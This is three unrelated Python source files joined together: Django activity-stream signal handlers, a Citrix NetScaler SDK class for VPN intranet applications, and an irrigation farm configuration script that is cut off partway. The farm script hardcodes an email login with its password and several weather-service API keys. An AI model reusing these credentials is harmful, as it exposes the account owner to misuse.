activity_entry.setting = conf_to_dict(instance)
activity_entry.save()
connection.on_commit(
lambda: emit_activity_stream_change(activity_entry)
)
def activity_stream_update(sender, instance, **kwargs):
if instance.id is None:
return
if not activity_stream_enabled:
return
try:
old = sender.objects.get(id=instance.id)
except sender.DoesNotExist:
return
new = instance
changes = model_instance_diff(old, new, model_serializer_mapping())
if changes is None:
return
_type = type(instance)
if getattr(_type, '_deferred', False):
return
object1 = camelcase_to_underscore(instance.__class__.__name__)
activity_entry = get_activity_stream_class()(
operation='update',
object1=object1,
changes=json.dumps(changes),
actor=get_current_user_or_none())
if instance._meta.model_name != 'setting': # Is not conf.Setting instance
activity_entry.save()
getattr(activity_entry, object1).add(instance.pk)
else:
activity_entry.setting = conf_to_dict(instance)
activity_entry.save()
connection.on_commit(
lambda: emit_activity_stream_change(activity_entry)
)
def activity_stream_delete(sender, instance, **kwargs):
if not activity_stream_enabled:
return
    # Inventory deletion happens in the task system rather than in the request-response
    # cycle. If we trigger this handler there, we may run into db-integrity-related race
    # conditions, so we require an explicit flag to bypass the normal signal handling.
    # This function is called with the flag set in Inventory.schedule_deletion.
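    # For example, a sketch of that explicit call (argument names illustrative):
    #     activity_stream_delete(Inventory, inventory_instance, inventory_delete_flag=True)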
changes = {}
if isinstance(instance, Inventory):
if not kwargs.get('inventory_delete_flag', False):
return
# Add additional data about child hosts / groups that will be deleted
changes['coalesced_data'] = {
'hosts_deleted': instance.hosts.count(),
'groups_deleted': instance.groups.count()
}
elif isinstance(instance, (Host, Group)) and instance.inventory.pending_deletion:
return # accounted for by inventory entry, above
_type = type(instance)
if getattr(_type, '_deferred', False):
return
changes.update(model_to_dict(instance, model_serializer_mapping()))
object1 = camelcase_to_underscore(instance.__class__.__name__)
if type(instance) == OAuth2AccessToken:
changes['token'] = CENSOR_VALUE
activity_entry = get_activity_stream_class()(
operation='delete',
changes=json.dumps(changes),
object1=object1,
actor=get_current_user_or_none())
activity_entry.save()
connection.on_commit(
lambda: emit_activity_stream_change(activity_entry)
)
def activity_stream_associate(sender, instance, **kwargs):
if not activity_stream_enabled:
return
if kwargs['action'] in ['pre_add', 'pre_remove']:
if kwargs['action'] == 'pre_add':
action = 'associate'
elif kwargs['action'] == 'pre_remove':
action = 'disassociate'
else:
return
obj1 = instance
_type = type(instance)
if getattr(_type, '_deferred', False):
return
object1=camelcase_to_underscore(obj1.__class__.__name__)
obj_rel = sender.__module__ + "." + sender.__name__
for entity_acted in kwargs['pk_set']:
obj2 = kwargs['model']
obj2_id = entity_acted
obj2_actual = obj2.objects.filter(id=obj2_id)
if not obj2_actual.exists():
continue
obj2_actual = obj2_actual[0]
_type = type(obj2_actual)
if getattr(_type, '_deferred', False):
return
if isinstance(obj2_actual, Role) and obj2_actual.content_object is not None:
obj2_actual = obj2_actual.content_object
object2 = camelcase_to_underscore(obj2_actual.__class__.__name__)
else:
object2 = camelcase_to_underscore(obj2.__name__)
            # Skip recording any inventory source, system job template, or system job changes here.
if isinstance(obj1, InventorySource) or isinstance(obj2_actual, InventorySource):
continue
if isinstance(obj1, SystemJobTemplate) or isinstance(obj2_actual, SystemJobTemplate):
continue
if isinstance(obj1, SystemJob) or isinstance(obj2_actual, SystemJob):
continue
activity_entry = get_activity_stream_class()(
changes=json.dumps(dict(object1=object1,
object1_pk=obj1.pk,
object2=object2,
object2_pk=obj2_id,
action=action,
relationship=obj_rel)),
operation=action,
object1=object1,
object2=object2,
object_relationship_type=obj_rel,
actor=get_current_user_or_none())
activity_entry.save()
getattr(activity_entry, object1).add(obj1.pk)
getattr(activity_entry, object2).add(obj2_actual.pk)
# Record the role for RBAC changes
if 'role' in kwargs:
role = kwargs['role']
if role.content_object is not None:
obj_rel = '.'.join([role.content_object.__module__,
role.content_object.__class__.__name__,
role.role_field])
# If the m2m is from the User side we need to
# set the content_object of the Role for our entry.
if type(instance) == User and role.content_object is not None:
getattr(activity_entry, role.content_type.name.replace(' ', '_')).add(role.content_object)
activity_entry.role.add(role)
activity_entry.object_relationship_type = obj_rel
activity_entry.save()
connection.on_commit(
lambda: emit_activity_stream_change(activity_entry)
)
@receiver(current_user_getter)
def get_current_user_from_drf_request(sender, **kwargs):
'''
    Provide a signal handler to return the current user from the current
request when using Django REST Framework. Requires that the APIView set
drf_request on the underlying Django Request object.
'''
request = get_current_request()
drf_request_user = getattr(request, 'drf_request_user', False)
return (drf_request_user, 0)
@receiver(pre_delete, sender=Organization)
def delete_inventory_for_org(sender, instance, **kwargs):
inventories = Inventory.objects.filter(organization__pk=instance.pk)
user = get_current_user_or_none()
for inventory in inventories:
try:
inventory.schedule_deletion(user_id=getattr(user, 'id', None))
except RuntimeError as e:
logger.debug(e)
@receiver(pre_delete, sender=WorkflowJobTemplateNode)
def delete_approval_templates(sender, instance, **kwargs):
if type(instance.unified_job_template) is WorkflowApprovalTemplate:
instance.unified_job_template.delete()
@receiver(pre_save, sender=WorkflowJobTemplateNode)
def delete_approval_node_type_change(sender, instance, **kwargs):
try:
old = WorkflowJobTemplateNode.objects.get(id=instance.id)
except sender.DoesNotExist:
return
if old.unified_job_template == instance.unified_job_template:
return
if type(old.unified_job_template) is WorkflowApprovalTemplate:
old.unified_job_template.delete()
@receiver(pre_delete, sender=WorkflowApprovalTemplate)
def deny_orphaned_approvals(sender, instance, **kwargs):
for approval in WorkflowApproval.objects.filter(workflow_approval_template=instance, status='pending'):
approval.deny()
@receiver(post_save, sender=Session)
def save_user_session_membership(sender, **kwargs):
session = kwargs.get('instance', None)
if not session:
return
user_id = session.get_decoded().get(SESSION_KEY, None)
if not user_id:
return
if UserSessionMembership.objects.filter(user=user_id, session=session).exists():
return
# check if user_id from session has an id match in User before saving
if User.objects.filter(id=int(user_id)).exists():
UserSessionMembership(user_id=user_id, session=session, created=timezone.now()).save()
expired = UserSessionMembership.get_memberships_over_limit(user_id)
for membership in expired:
Session.objects.filter(session_key__in=[membership.session_id]).delete()
membership.delete()
if len(expired):
consumers.emit_channel_notification(
'control-limit_reached_{}'.format(user_id),
dict(group_name='control', reason='limit_reached')
)
@receiver(post_save, sender=OAuth2AccessToken)
def create_access_token_user_if_missing(sender, **kwargs):
obj = kwargs['instance']
if obj.application and obj.application.user:
obj.user = obj.application.user
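        # Temporarily disconnect this handler so the save() below does not re-enter it.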
post_save.disconnect(create_access_token_user_if_missing, sender=OAuth2AccessToken)
obj.save()
post_save.connect(create_access_token_user_if_missing, sender=OAuth2AccessToken)
# Connect the Instance Group to Activity Stream receivers.
post_save.connect(activity_stream_create, sender=InstanceGroup, dispatch_uid=str(InstanceGroup) + "_create")
pre_save.connect(activity_stream_update, sender=InstanceGroup, dispatch_uid=str(InstanceGroup) + "_update")
pre_delete.connect(activity_stream_delete, sender=InstanceGroup, dispatch_uid=str(InstanceGroup) + "_delete")
|
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class vpnintranetapplication(base_resource) :
""" Configuration for SSLVPN intranet application resource. """
def __init__(self) :
self._intranetapplication = ""
self._protocol = ""
self._destip = ""
self._netmask = ""
self._iprange = ""
self._hostname = ""
self._clientapplication = []
self._spoofiip = ""
self._destport = ""
self._interception = ""
self._srcip = ""
self._srcport = 0
self._ipaddress = ""
self.___count = 0
@property
def intranetapplication(self) :
"""Name of the intranet application.<br/>Minimum length = 1<br/>Maximum length = 31.
"""
try :
return self._intranetapplication
except Exception as e:
raise e
@intranetapplication.setter
def intranetapplication(self, intranetapplication) :
"""Name of the intranet application.<br/>Minimum length = 1<br/>Maximum length = 31
"""
try :
self._intranetapplication = intranetapplication
except Exception as e:
raise e
@property
def protocol(self) :
"""Protocol used by the intranet application. If protocol is set to BOTH, TCP and UDP traffic is allowed.<br/>Possible values = TCP, UDP, ANY.
"""
try :
return self._protocol
except Exception as e:
raise e
@protocol.setter
def protocol(self, protocol) :
"""Protocol used by the intranet application. If protocol is set to BOTH, TCP and UDP traffic is allowed.<br/>Possible values = TCP, UDP, ANY
"""
try :
self._protocol = protocol
except Exception as e:
raise e
@property
def destip(self) :
"""Destination IP address, IP range, or host name of the intranet application. This address is the server IP address.<br/>Minimum length = 1.
"""
try :
return self._destip
except Exception as e:
raise e
@destip.setter
def destip(self, destip) :
"""Destination IP address, IP range, or host name of the intranet application. This address is the server IP address.<br/>Minimum length = 1
"""
try :
self._destip = destip
except Exception as e:
raise e
@property
def netmask(self) :
"""Destination subnet mask for the intranet application.
"""
try :
return self._netmask
except Exception as e:
raise e
@netmask.setter
def netmask(self, netmask) :
"""Destination subnet mask for the intranet application.
"""
try :
self._netmask = netmask
except Exception as e:
raise e
@property
def iprange(self) :
"""If you have multiple servers in your network, such as web, email, and file shares, configure an intranet application that includes the IP range for all the network applications. This allows users to access all the intranet applications contained in the IP address range.<br/>Minimum length = 1.
"""
try :
return self._iprange
except Exception as e:
raise e
@iprange.setter
def iprange(self, iprange) :
"""If you have multiple servers in your network, such as web, email, and file shares, configure an intranet application that includes the IP range for all the network applications. This allows users to access all the intranet applications contained in the IP address range.<br/>Minimum length = 1
"""
try :
self._iprange = iprange
except Exception as e:
raise e
@property
def hostname(self) :
"""Name of the host for which to configure interception. The names are resolved during interception when users log on with the NetScaler Gateway Plug-in.<br/>Minimum length = 1.
"""
try :
return self._hostname
except Exception as e:
raise e
@hostname.setter
def hostname(self, hostname) :
"""Name of the host for which to configure interception. The names are resolved during interception when users log on with the NetScaler Gateway Plug-in.<br/>Minimum length = 1
"""
try :
self._hostname = hostname
except Exception as e:
raise e
@property
def clientapplication(self) :
"""Names of the client applications, such as PuTTY and Xshell.<br/>Minimum length = 1.
"""
try :
return self._clientapplication
except Exception as e:
raise e
@clientapplication.setter
def clientapplication(self, clientapplication) :
"""Names of the client applications, such as PuTTY and Xshell.<br/>Minimum length = 1
"""
try :
self._clientapplication = clientapplication
except Exception as e:
raise e
@property
def spoofiip(self) :
"""IP address that the intranet application will use to route the connection through the virtual adapter.<br/>Default value: ON<br/>Possible values = ON, OFF.
"""
try :
return self._spoofiip
except Exception as e:
raise e
@spoofiip.setter
def spoofiip(self, spoofiip) :
"""IP address that the intranet application will use to route the connection through the virtual adapter.<br/>Default value: ON<br/>Possible values = ON, OFF
"""
try :
self._spoofiip = spoofiip
except Exception as e:
raise e
@property
def destport(self) :
"""Destination TCP or UDP port number for the intranet application. Use a hyphen to specify a range of port numbers, for example 90-95.<br/>Minimum length = 1.
"""
try :
return self._destport
except Exception as e:
raise e
@destport.setter
def destport(self, destport) :
"""Destination TCP or UDP port number for the intranet application. Use a hyphen to specify a range of port numbers, for example 90-95.<br/>Minimum length = 1
"""
try :
self._destport = destport
except Exception as e:
raise e
@property
def interception(self) :
"""Interception mode for the intranet application or resource. Correct value depends on the type of client software used to make connections. If the interception mode is set to TRANSPARENT, users connect with the NetScaler Gateway Plug-in for Windows. With the PROXY setting, users connect with the NetScaler Gateway Plug-in for Java.<br/>Possible values = PROXY, TRANSPARENT.
"""
try :
return self._interception
except Exception as e:
raise e
@interception.setter
def interception(self, interception) :
"""Interception mode for the intranet application or resource. Correct value depends on the type of client software used to make connections. If the interception mode is set to TRANSPARENT, users connect with the NetScaler Gateway Plug-in for Windows. With the PROXY setting, users connect with the NetScaler Gateway Plug-in for Java.<br/>Possible values = PROXY, TRANSPARENT
"""
try :
self._interception = interception
except Exception as e:
raise e
@property
def srcip(self) :
"""Source IP address. Required if interception mode is set to PROXY. Default is the loopback address, 127.0.0.1.<br/>Minimum length = 1.
"""
try :
return self._srcip
except Exception as e:
raise e
@srcip.setter
def srcip(self, srcip) :
"""Source IP address. Required if interception mode is set to PROXY. Default is the loopback address, 127.0.0.1.<br/>Minimum length = 1
"""
try :
self._srcip = srcip
except Exception as e:
raise e
@property
def srcport(self) :
"""Source port for the application for which the NetScaler Gateway virtual server proxies the traffic. If users are connecting from a device that uses the NetScaler Gateway Plug-in for Java, applications must be configured manually by using the source IP address and TCP port values specified in the intranet application profile. If a port value is not set, the destination port value is used.<br/>Minimum length = 1.
"""
try :
return self._srcport
except Exception as e:
raise e
@srcport.setter
def srcport(self, srcport) :
"""Source port for the application for which the NetScaler Gateway virtual server proxies the traffic. If users are connecting from a device that uses the NetScaler Gateway Plug-in for Java, applications must be configured manually by using the source IP address and TCP port values specified in the intranet application profile. If a port value is not set, the destination port value is used.<br/>Minimum length = 1
"""
try :
self._srcport = srcport
except Exception as e:
raise e
@property
def ipaddress(self) :
"""The IP address for the application. This address is the real application server IP address.
"""
try :
return self._ipaddress
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(vpnintranetapplication_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.vpnintranetapplication
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
if (self.intranetapplication) :
return str(self.intranetapplication)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
""" Use this API to add vpnintranetapplication.
"""
try :
if type(resource) is not list :
addresource = vpnintranetapplication()
addresource.intranetapplication = resource.intranetapplication
addresource.protocol = resource.protocol
addresource.destip = resource.destip
addresource.netmask = resource.netmask
addresource.iprange = resource.iprange
addresource.hostname = resource.hostname
addresource.clientapplication = resource.clientapplication
addresource.spoofiip = resource.spoofiip
addresource.destport = resource.destport
addresource.interception = resource.interception
addresource.srcip = resource.srcip
addresource.srcport = resource.srcport
return addresource.add_resource(client)
else :
if (resource and len(resource) > 0) :
addresources = [ vpnintranetapplication() for _ in range(len(resource))]
for i in range(len(resource)) :
addresources[i].intranetapplication = resource[i].intranetapplication
addresources[i].protocol = resource[i].protocol
addresources[i].destip = resource[i].destip
addresources[i].netmask = resource[i].netmask
addresources[i].iprange = resource[i].iprange
addresources[i].hostname = resource[i].hostname
addresources[i].clientapplication = resource[i].clientapplication
addresources[i].spoofiip = resource[i].spoofiip
addresources[i].destport = resource[i].destport
addresources[i].interception = resource[i].interception
addresources[i].srcip = resource[i].srcip
addresources[i].srcport = resource[i].srcport
result = cls.add_bulk_request(client, addresources)
return result
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
""" Use this API to delete vpnintranetapplication.
"""
try :
if type(resource) is not list :
deleteresource = vpnintranetapplication()
if type(resource) != type(deleteresource):
deleteresource.intranetapplication = resource
else :
deleteresource.intranetapplication = resource.intranetapplication
return deleteresource.delete_resource(client)
else :
if type(resource[0]) != cls :
if (resource and len(resource) > 0) :
deleteresources = [ vpnintranetapplication() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].intranetapplication = resource[i]
else :
if (resource and len(resource) > 0) :
deleteresources = [ vpnintranetapplication() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].intranetapplication = resource[i].intranetapplication
result = cls.delete_bulk_request(client, deleteresources)
return result
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
""" Use this API to fetch all the vpnintranetapplication resources that are configured on netscaler.
"""
try :
if not name :
obj = vpnintranetapplication()
response = obj.get_resources(client, option_)
else :
if type(name) != cls :
if type(name) is not list :
obj = vpnintranetapplication()
obj.intranetapplication = name
response = obj.get_resource(client, option_)
else :
if name and len(name) > 0 :
response = [vpnintranetapplication() for _ in range(len(name))]
obj = [vpnintranetapplication() for _ in range(len(name))]
for i in range(len(name)) :
obj[i] = vpnintranetapplication()
obj[i].intranetapplication = name[i]
response[i] = obj[i].get_resource(client, option_)
return response
except Exception as e :
raise e
@classmethod
def get_filtered(cls, client, filter_) :
""" Use this API to fetch filtered set of vpnintranetapplication resources.
		Filter string should be in JSON format, e.g., "port:80,servicetype:HTTP".
"""
try :
obj = vpnintranetapplication()
option_ = options()
option_.filter = filter_
response = obj.getfiltered(client, option_)
return response
except Exception as e :
raise e
@classmethod
def count(cls, client) :
""" Use this API to count the vpnintranetapplication resources configured on NetScaler.
"""
try :
obj = vpnintranetapplication()
option_ = options()
option_.count = True
response = obj.get_resources(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
@classmethod
def count_filtered(cls, client, filter_) :
""" Use this API to count filtered the set of vpnintranetapplication resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = vpnintranetapplication()
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(client, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e :
raise e
class Spoofiip:
ON = "ON"
OFF = "OFF"
class Protocol:
TCP = "TCP"
UDP = "UDP"
ANY = "ANY"
class Interception:
PROXY = "PROXY"
TRANSPARENT = "TRANSPARENT"
class vpnintranetapplication_response(base_response) :
def __init__(self, length=1) :
self.vpnintranetapplication = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.vpnintranetapplication = [vpnintranetapplication() for _ in range(length)]
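# Usage sketch (illustrative; 'client' stands for an authenticated nitro_service
# instance and the values shown are placeholders):
#
#     app = vpnintranetapplication()
#     app.intranetapplication = "intranet_web"
#     app.protocol = vpnintranetapplication.Protocol.TCP
#     app.destip = "10.0.0.10"
#     app.netmask = "255.255.255.255"
#     app.destport = "80"
#     app.interception = vpnintranetapplication.Interception.TRANSPARENT
#     vpnintranetapplication.add(client, app)
#
#     configured = vpnintranetapplication.get(client)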
|
|
# file build system
#
# The purpose of this file is to load a system configuration
# into the graph database.
#
import json
import redis
import redis_graph
import farm_template
from redis_graph.redis_graph_query import Query_Configuration
import copy
class Graph_Management():
def __init__( self , controller_name, io_server_name, data_store_name ):
self.redis_handle = redis.StrictRedis( host = "localhost", port=6379, db = 15 )
self.common = redis_graph.redis_graph_common.Redis_Graph_Common( self.redis_handle)
self.qc = redis_graph.redis_graph_query.Query_Configuration( self.redis_handle, self.common )
self.controller_name = controller_name
self.io_server_name = io_server_name
self.data_store_name = data_store_name
self.initialize_cb_handlers()
def match_relationship( self, query_string, json_flag = True ):
keys = self.qc.match_relationship( query_string )
return_value = []
for i in keys:
data = self.redis_handle.hgetall(i)
#print "data",data
temp = {}
for j in data.keys():
#print j, data[j]
try:
if json_flag == True:
temp[j] = json.loads(data[j])
else:
temp[j] = data[j]
except:
temp[j] = data[j]
return_value.append(temp)
return return_value
def find_relationship_keys( self, query_string, json_flag = True ):
return self.qc.match_relationship( query_string )
def find_remotes( self ):
keys = self.match_relationship("REMOTE_UNIT")
return keys
def find_remotes_by_function( self, function ):
        keys = self.match_relationship("REMOTE_UNIT")
return_value = []
for i in keys:
if function in set(i["function"]) :
return_value.append(i)
return return_value
def find_data_store_by_function(self, function):
keys = self.qc.match_label_property_generic( "DATA_STORE", "name", self.data_store_name, function )
return_value = {}
for i in keys:
data = self.redis_handle.hgetall(i)
return_value[data["name"]]= data
return return_value
def find_data_stores( self ):
data = self.match_relationship("DATA_STORE")
return data
def find_io_servers( self ):
keys = self.match_relationship("UDP_IO_SERVER")
return keys
def get_data( self, key,json_flag = True):
data = self.redis_handle.hgetall(key)
#print "data",key,data
temp = {}
for j in data.keys():
#print j, data[j]
try:
if json_flag == True:
temp[j] = json.loads(data[j])
else:
temp[j] = data[j]
except:
temp[j] = data[j]
return temp
def get_value( self, key ):
return self.redis_handle.hgetall(key["namespace"])
def convert_namespace( self, name ):
name = name.replace(chr(0x82),"[")
name = name.replace(chr(0x83),"~")
name = name.replace(chr(0x84),"]")
name = name.replace(chr(0x85),":")
return name
def assemble_name_list( self,key, property_array):
return_value = []
for i in property_array:
return_value.append(i[key])
return return_value
def form_key_list( self,key, property_array ):
return_value = []
for i in property_array:
return_value.append(i[key])
return return_value
def form_list_dict_from_keys( self, key, value_list, property_array):
return_value = []
for i in property_array:
print (i.keys() )
temp = {}
for j in value_list:
temp[i[key]] = i[j]
return_value.append(temp)
return return_value
def form_dict_from_keys( self, key, value, property_array):
return_value = {}
for i in property_array:
print( i.keys() )
return_value[i[key]] = i[value]
return return_value
def initialize_cb_handlers( self ):
self.cb_handlers = {}
def add_cb_handler( self, tag, function ):
self.cb_handlers[ tag ] = function
def verify_handler( self, tag ):
try:
            return tag in self.cb_handlers
except:
#print "handlers:", type(self.cb_handlers)
print ("tag", tag )
raise
def execute_cb_handlers( self, tag, value, parameters ): # parameters is a list
function = self.cb_handlers[tag]
return function( tag, value , parameters )
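# Usage sketch (illustrative; assumes the redis graph on localhost:6379, db 15 has
# already been populated by the construction code below):
#
#     gm = Graph_Management("lacima_controller", "io_server_1", "data_store_1")
#     remotes = gm.find_remotes()
#     data_stores = gm.find_data_stores()
#     io_servers = gm.find_io_servers()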
if __name__ == "__main__" :
redis_handle = redis.StrictRedis( host = "localhost", port=6379, db = 15 )
common = redis_graph.redis_graph_common.Redis_Graph_Common( redis_handle)
qc = redis_graph.redis_graph_query.Query_Configuration( redis_handle, common )
bc = redis_graph.redis_graph_populate.Build_Configuration(redis_handle,common)
cf = farm_template.Construct_Farm(redis_handle,common)
#
#
# Construct Systems
#
#
cf.construct_system("LaCima Operations")
#
#
# Construction Sites for LaCima
#
#
cf.construct_site( name="LaCima",address="21005 Paseo Montana Murrieta, Ca 92562")
# we are going to construct the data store here
cf.add_header_node("APPLICATION_SUPPORT")
cf.add_header_node( "UTILITY_MODULE", properties = {}, json_flag= True )
cf.add_info_node( "CIMIS_EMAIL","CIMIS_EMAIL",properties = { "imap_username" :'lacima.ranch@gmail.com',"imap_password" : 'Gr1234gfd'} , json_flag = True)
cf.end_header_node("UTILITY_MODULE")
cf.add_header_node( "MOISTURE_CONTROLLERS", properties = {}, json_flag= True )
cf.add_info_node("MOISTURE_MANUAL_UPDATE_FLAG","MANUAL_UPDATE_FLAG",properties = {},json_flag = True)
description_map = ["Bank 10A Watermark 8 inch","Bank 10A Resistive 8 inch", "Bank 10A Resistive 18 inch", "empty",
"Bank 10B Watermark 8 inch", "Bank 10B Resistive 8 inch","Bank 10B Resistive 18 inch","empty",
"Bank 10C Watermark 8 inch","Bank 10C Resistive 8 inch", "Bank 10C Resistive 18 inch", "empty",
"Bank 10D Watermark 8 inch", "Bank 10D Resistive 8 inch","Bank 10D Resistive 18 inch","empty" ]
depth_map = [8,8,18,0,8,8,18,0,8,8,18,0,8,8,18,0]
properties = {}
properties["description"] = "Moisture Sensor for Irrigation Bank10"
properties["description_map"] = description_map
properties["update_time"] = 15
properties["depth_map"] = depth_map
properties["moisture_list_store"] = "MOISTURE_1_DATA_STORE"
properties["air_temp_list_store"] = "MOISTURE_1_AIR_TEMP_LIST_STORE"
properties["roll_over_list_store"] = "MOISTURE_1_ROLL_OVER_LIST_STORE"
properties["slave_controller_address"] = 40
cf.add_info_node( "MOISTURE_CTR","moisture_1", properties = properties, json_flag= True )
cf.end_header_node("MOISTURE_CONTROLLERS")
cf.add_info_node( "CLOUD_STATUS_STORE","status_store", properties = {"queue_name":"status_store"} )
#altitude = 2400
#cf.add_eto_setup_code(access_codes = access_codes, altitude = altitude)
#cf.start_info_store()
#cf.add_eto_store()
cf.add_header_node( "ETO_SITES", properties = {"integrated_measurement":"LACIMA_INTEGRATED_ETO_ESTIMATE",
"measurement":"LACIMA_ETO_MEASUREMENTS",
"mv_threshold_number":1 } )
properties = { "api-key":"e1d03467-5c0d-4a9b-978d-7da2c32d95de" , "url":"http://et.water.ca.gov/api/data" , "longitude": -117.299459 ,"latitude":33.578156 }
properties["altitude"] = 2400
properties["measurement_tag"] = "CIMIS_SATELLITE_ETO"
properties["list_length"] = 100
properties["measurement"] = "CIMIS_SATELLITE_ETO_STORE"
properties["majority_vote_flag"] = True
cf.add_info_node( "ETO_ENTRY","ETO_CIMIS_SATELLITE",properties=properties, json_flag=True)
properties = { "api-key":"e1d03467-5c0d-4a9b-978d-7da2c32d95de" , "url":"http://et.water.ca.gov/api/data" , "station":62 }
properties["altitude"] = 2400
properties["measurement_tag"] = "CIMIS_ETO"
properties["list_length"] = 100
properties["measurement"] = "CIMIS_ETO_STORE"
properties["majority_vote_flag"] = True
cf.add_info_node( "ETO_ENTRY","ETO_CIMIS",properties=properties, json_flag=True)
properties = {"api-key":"8b165ee73a734f379a8c91460afc98a1" ,"url":"http://api.mesowest.net/v2/stations/timeseries?" , "station":"SRUC1" }
properties["altitude"] = 2400
properties["measurement_tag"] = "SRUC1_ETO"
properties["list_length"] = 100
properties["measurement"] = "SRUC1_ETO_STORE"
properties["majority_vote_flag"] = True
cf.add_info_node( "ETO_ENTRY","Santa_Rosa_RAWS",properties=properties, json_flag=True)
properties = {"api-key":"8b165ee73a734f379a8c91460afc98a1" ,"url":"http://api.mesowest.net/v2/stations/timeseries?" , "station":"SRUC1" }
properties["altitude"] = 2400
properties["measurement_tag"] = "HYBRID_SITE"
properties["list_length"] = 100
properties["measurement"] = "HYBRID_SITE_STORE"
properties["rollover"] = "moisture_1_rollover"
properties["majority_vote_flag"] = False
cf.add_info_node( "ETO_ENTRY","LaCima_Ranch",properties=properties, json_flag=True)
cf.end_header_node("ETO_SITES")
cf.add_header_node("RAIN_SOURCES",properties = {"measurement":"LACIMA_RAIN_MEASUREMENTS" } )
properties = { "api-key":"e1d03467-5c0d-4a9b-978d-7da2c32d95de" , "url":"http://et.water.ca.gov/api/data" , "station":62 }
properties["measurement_tag"] = "CIMIS_RAIN"
properties["list_length"] = 100
properties["measurement"] = "CIMIS_RAIN_STORE"
cf.add_info_node( "RAIN_ENTRY","CIMIS_RAIN",properties=properties, json_flag=True)
properties = {"api-key":"8b165ee73a734f379a8c91460afc98a1" ,"url":"http://api.mesowest.net/v2/stations/precip?" , "station":"SRUC1" }
properties["measurement_tag"] ="SRUC1_RAIN"
properties["list_length"] = 100
properties["measurement"] = "SRCU1_RAIN_STORE"
cf.add_info_node( "RAIN_ENTRY","SRUC1_RAIN",properties=properties, json_flag=True)
cf.end_header_node("RAIN_SOURCES")
cf.end_header_node("APPLICATION_SUPPORT")
cf.add_header_node("DATA_STORE",properties={"ip":"192.168.1.84","port":6379},json_flag = True)
cf.add_header_node( "DATA_ACQUISITION")
cf.add_header_node( "FIFTEEN_SEC_ACQUISITION",properties= {"measurement":"FIFTEEN_SEC_ACQUISITION","length":5760, "routing_key":"FIFTEEN_SEC_ACQUISITION" } )
properties = {}
properties["units"] = ""
properties["modbus_remote"] = "satellite_1"
properties["m_tag"] = "read_input_bit"
properties["parameters"] = [ "X002"]
properties["exec_tag" ] = ["get_gpio","master_valve_set_switch"]
cf.add_info_node( "FIFTEEN_SEC_ELEMENT","MASTER_VALVE_SWITCH_SET",properties=properties, json_flag=True)
properties = {}
properties["units"] = ""
properties["modbus_remote"] = "satellite_1"
properties["m_tag"] = "read_input_bit"
properties["parameters"] = [ "X003"]
properties["exec_tag" ] = ["get_gpio","master_valve_reset_switch"]
cf.add_info_node( "FIFTEEN_SEC_ELEMENT","MASTER_VALVE_SWITCH_RESET",properties=properties, json_flag=True)
cf.end_header_node("FIFTEEN_SEC_ACQUISITION") #DATA_ACQUISITION
cf.add_header_node( "MINUTE_ACQUISITION",properties= {"measurement":"MINUTE_LIST_STORE","length":10000, "routing_key":"MINUTE_ACQUISTION" } , json_flag=True )
properties = {}
properties["units"] = "mAmps"
properties["modbus_remote"] = "satellite_1"
properties["m_tag"] = "measure_analog"
properties["parameters"] = [ "DF1",1.0]
properties["exec_tag" ] = ["transfer_controller_current"]
cf.add_info_node( "MINUTE_ELEMENT","CONTROLLER_CURRENT",properties=properties, json_flag=True)
properties = {}
properties["units"] = "mAmps"
properties["modbus_remote"] = "satellite_1"
properties["m_tag"] = "measure_analog"
properties["parameters"] = ["DF2",1.0]
properties["exec_tag"] = ["transfer_irrigation_current"]
cf.add_info_node( "MINUTE_ELEMENT","IRRIGATION_VALVE_CURRENT",properties=properties, json_flag=True)
cf.add_header_node("FLOW_METER_LIST")
properties = {}
properties["units"] = "GPM"
properties["modbus_remote"] = "satellite_1"
properties["parameters"] = ["DS301", "C201",.0224145939] # counter id
properties["m_tag"] = "measure_counter"
properties["exec_tag"] = ["transfer_flow",.0224145939]
cf.add_info_node( "MINUTE_ELEMENT","MAIN_FLOW_METER",properties=properties, json_flag=True)
cf.end_header_node("FLOW_METER_LIST") #FLOW_METER_LIST
#cf.add_info_node( "MINUTE_ELEMENT","WELL_CONTROLLER_OUTPUT",properties={"units":"AMPS"}, json_flag = True )
#cf.add_info_node( "MINUTE_ELEMENT","WELL_CONTROLLER_INPUT", properties={"units":"AMPS" }, json_flag = True)
#cf.add_info_node( "MINUTE_ELEMENT","FILTER_PRESSURE", properties = { "units":"PSI" }, json_flag = True )
#cf.add_info_node( "MINUTE_ELEMENT", "WELL_PRESSURE", properties = {"units":"PSI" }, json_flag = True )
cf.end_header_node("MINUTE_ACQUISITION") #"MINUTE_ACQUISITION"
cf.add_header_node( "HOUR_ACQUISTION",properties= {"measurement":"HOUR_LIST_STORE","length":300 , "routing_key":"HOUR_ACQUISTION"} , json_flag=True )
properties = {}
